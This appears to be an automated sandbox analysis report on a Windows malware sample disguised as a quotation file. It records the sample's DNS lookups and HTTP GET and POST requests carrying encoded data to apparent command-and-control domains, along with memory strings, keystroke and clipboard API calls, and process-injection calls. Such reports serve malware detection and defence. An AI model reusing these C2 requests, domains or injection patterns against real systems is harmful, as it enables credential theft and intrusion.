    GET /2mep/?T2M=Y0Z0G&KxZ=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdk/wMyoJJMo2d1H/wS+I5dkctw90/UWWKH7Hql+RyzctUTqPRuvs= HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Host: www.127358.win
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)

Source: global traffic | HTTP traffic detected:
    GET /cnve/?KxZ=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVY2k1UguS5MLScqsLEwQyiaZDJDNhiwSLktxebIPhr8mPgUz4eag=&T2M=Y0Z0G HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Host: www.infohive.website
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)

Source: global traffic | HTTP traffic detected:
    GET /ead0/?KxZ=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBirmmsaQUUC+82V9qNTTK4Z1SvR6iko7BzlkPk6J7u5V/wAfiNkI=&T2M=Y0Z0G HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Host: www.sunnyz.store
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)

Source: global traffic | HTTP traffic detected:
    GET /dc08/?KxZ=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z35TM8/OCjKyI0RRWf5xhtUunUrv8dIQZV5rCv+EV3icANGbLYtw=&T2M=Y0Z0G HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Host: www.muasamgiare.click
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)

Source: global traffic | HTTP traffic detected:
    GET /wvsm/?T2M=Y0Z0G&KxZ=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2oBm3vCtx6xeHagKgyNNQL6/tdUVValn9agt9lf/uYkxXHUES57U= HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Host: www.sfantulandrei.info
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)

Source: global traffic | HTTP traffic detected:
    GET /0pqe/?KxZ=aJYCdvvPx+uKS5Ogd0A7vBDK6OZ68qCTbFX0p5fCFhilae8HyBK0z8Ue4klxYsqgBES9oGplOKNa3q3+NTywUHb6Ky4Osqfr3aB0kL6LN4sT6D7TOK7CTnegghrlX225G7BgQJc=&T2M=Y0Z0G HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Host: www.mffnow.info
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic | DNS traffic detected: DNS query: www.qqa79.top
Source: global traffic | DNS traffic detected: DNS query: www.gk88top.top
Source: global traffic | DNS traffic detected: DNS query: www.127358.win
Source: global traffic | DNS traffic detected: DNS query: www.infohive.website
Source: global traffic | DNS traffic detected: DNS query: www.sunnyz.store
Source: global traffic | DNS traffic detected: DNS query: www.muasamgiare.click
Source: global traffic | DNS traffic detected: DNS query: www.sfantulandrei.info
Source: global traffic | DNS traffic detected: DNS query: www.mffnow.info
Source: global traffic | DNS traffic detected: DNS query: www.3kw40881107247y.click
Source: unknown | HTTP traffic detected:
    POST /vjnn/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.5
    Host: www.gk88top.top
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    Content-Length: 208
    Cache-Control: no-cache
    Origin: http://www.gk88top.top
    Referer: http://www.gk88top.top/vjnn/
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
    Data Ascii: KxZ=y/nbf6lCzqeuPysmEJy86ffNMABc7U2Y99v9br8RWFDR/ZZ9OBNoxvdWw4os3r7Oxy5acUB9wcG/AsK2D98v3Vh9+BRRmsPKFhUVzbm0AYKrw9Ob1Jx4v+NQV6BOVmu6UbAgTNoQLpcX7w6Dpk9CpKgqItS5gLPeuo8DHCJrNevg6e5fEzmbkFvwk7jWsgtPLpZyhhYkUbMP
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 06 Dec 2024 09:05:31 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: close
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 06 Dec 2024 09:05:56 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BfEY4MD7EiNSxpUccanJMTEy9vKgxk8JqK79xGUR5yRb92JEMa44UP1sjKcLUf3e2bMVLBPx4LdwJFOsKgFZ6Fkb3E2RoXOzZ%2BurN0k1tdkibbNboX4W%2FFD3FyxgdhHvDbc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8edb1df2c834439c-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1556&rtt_var=778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=591&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Data Ascii: 448<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 06 Dec 2024 09:06:04 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: close
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 06 Dec 2024 09:06:07 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: close
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 06 Dec 2024 09:06:10 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: close
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 06 Dec 2024 09:06:12 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: close
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 06 Dec 2024 09:06:19 GMT
    Server: Apache
    Content-Length: 493
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 06 Dec 2024 09:06:22 GMT
    Server: Apache
    Content-Length: 493
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 06 Dec 2024 09:06:25 GMT
    Server: Apache
    Content-Length: 493
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 06 Dec 2024 09:06:27 GMT
    Server: Apache
    Content-Length: 493
    Connection: close
    Content-Type: text/html; charset=utf-8
    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 06 Dec 2024 09:07:36 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rK8BUbrzb1SFW40gXkWsE2SjUE3Qf3e157hApvmONvKoMcgP9T%2FgdF%2BpyJe9NklnKusebH8fQRImm85ut3pRFgw76lL0yuz5auTJfSZ22FPbSS1iAwFhxBB4RKJmtbdWu7N7z2Wi2SBbLCwo"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8edb2066480442d7-EWR
    Content-Encoding: gzip
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1861&min_rtt=1861&rtt_var=930&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=881&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 06 Dec 2024 09:07:38 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LmwbRBaAFWGVZYx9Q6BWA0PYMrYO97fBtKTafVdPpZAaLEaigdIk9LF71w%2FmHUDWm6Ok1W023j3wqb73dX3qD1On28h18CwTPeTItKwYX4IRkMHYl4eMTiaSMq7KKKME04Li3b71qsyLdOFm"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8edb2076f9b0c333-EWR
    Content-Encoding: gzip
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1506&min_rtt=1506&rtt_var=753&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=905&delivery_rate=0&cwnd=141&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: FOBNeEFwBsF.exe, 0000000E.00000002.4010692987.0000000004F08000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.3kw40881107247y.click
                Source: FOBNeEFwBsF.exe, 0000000E.00000002.4010692987.0000000004F08000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.3kw40881107247y.click/yy0e/
                Source: comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: comp.exe, 0000000D.00000002.4009464968.00000000045BA000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.00000000032FA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                Source: comp.exe, 0000000D.00000002.4009464968.00000000045BA000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.00000000032FA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                Source: comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: comp.exe, 0000000D.00000002.4007580490.0000000002F7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: comp.exe, 0000000D.00000003.2772017876.0000000008186000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: comp.exe, 0000000D.00000002.4007580490.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: comp.exe, 0000000D.00000002.4007580490.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: comp.exe, 0000000D.00000002.4007580490.0000000002F7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: comp.exe, 0000000D.00000002.4007580490.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: comp.exe, 0000000D.00000002.4007580490.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: comp.exe, 0000000D.00000002.4009464968.000000000474C000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.000000000348C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://whois.gandi.net/en/results?search=sunnyz.store
                Source: comp.exe, 0000000D.00000002.4009464968.0000000004296000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.0000000002FD6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.aapanel.com/new/download.html?invite_code=aapanele
                Source: comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                Source: comp.exe, 0000000D.00000002.4011130087.0000000006760000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009464968.000000000474C000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.000000000348C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.gandi.net/en/domain
                Source: comp.exe, 0000000D.00000002.4011130087.0000000006760000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009464968.0000000004A70000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.00000000037B0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
                Source: comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: comp.exe, 0000000D.00000002.4009464968.00000000048DE000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.000000000361E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.muasamgiare.click/dc08/?KxZ=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe Code function: 0_2_00E74164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00E74164
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe Code function: 0_2_00E73F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00E73F66
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe Code function: 0_2_00E6001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_00E6001C
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe Code function: 0_2_00E8CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_00E8CABC

                E-Banking Fraud

                Source: Yara match File source: 4.2.svchost.exe.2640000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 4.2.svchost.exe.2640000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000004.00000002.2589543027.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000D.00000002.4007316653.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000D.00000002.4008699192.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000E.00000002.4010692987.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.2590876860.0000000005120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000D.00000002.4008790036.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000002.4008647896.0000000002CC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.2590442326.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe Code function: This is a third-party compiled AutoIt script. 0_2_00E03B3A
                Source: QUOTATON-37839993.exe String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: QUOTATON-37839993.exe, 00000000.00000000.2134222857.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_806e8f3a-0
                Source: QUOTATON-37839993.exe, 00000000.00000000.2134222857.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_806adc5d-e
                Source: QUOTATON-37839993.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_f49cce8e-c
                Source: QUOTATON-37839993.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_440c34cc-e
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0266C643 NtClose, 4_2_0266C643
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_026418C0 NtProtectVirtualMemory, 4_2_026418C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0264191D NtProtectVirtualMemory, 4_2_0264191D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_026419C9 NtProtectVirtualMemory, 4_2_026419C9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_026419A5 NtProtectVirtualMemory, 4_2_026419A5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0264199A NtProtectVirtualMemory, 4_2_0264199A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072B60 NtClose,LdrInitializeThunk, 4_2_03072B60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_03072DF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_03072C70
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_030735C0 NtCreateMutant,LdrInitializeThunk, 4_2_030735C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03074340 NtSetContextThread, 4_2_03074340
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03074650 NtSuspendThread, 4_2_03074650
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072B80 NtQueryInformationFile, 4_2_03072B80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072BA0 NtEnumerateValueKey, 4_2_03072BA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072BE0 NtQueryValueKey, 4_2_03072BE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072BF0 NtAllocateVirtualMemory, 4_2_03072BF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072AB0 NtWaitForSingleObject, 4_2_03072AB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072AD0 NtReadFile, 4_2_03072AD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072AF0 NtWriteFile, 4_2_03072AF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072F30 NtCreateSection, 4_2_03072F30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072F60 NtCreateProcessEx, 4_2_03072F60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072F90 NtProtectVirtualMemory, 4_2_03072F90
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072FA0 NtQuerySection, 4_2_03072FA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072FB0 NtResumeThread, 4_2_03072FB0
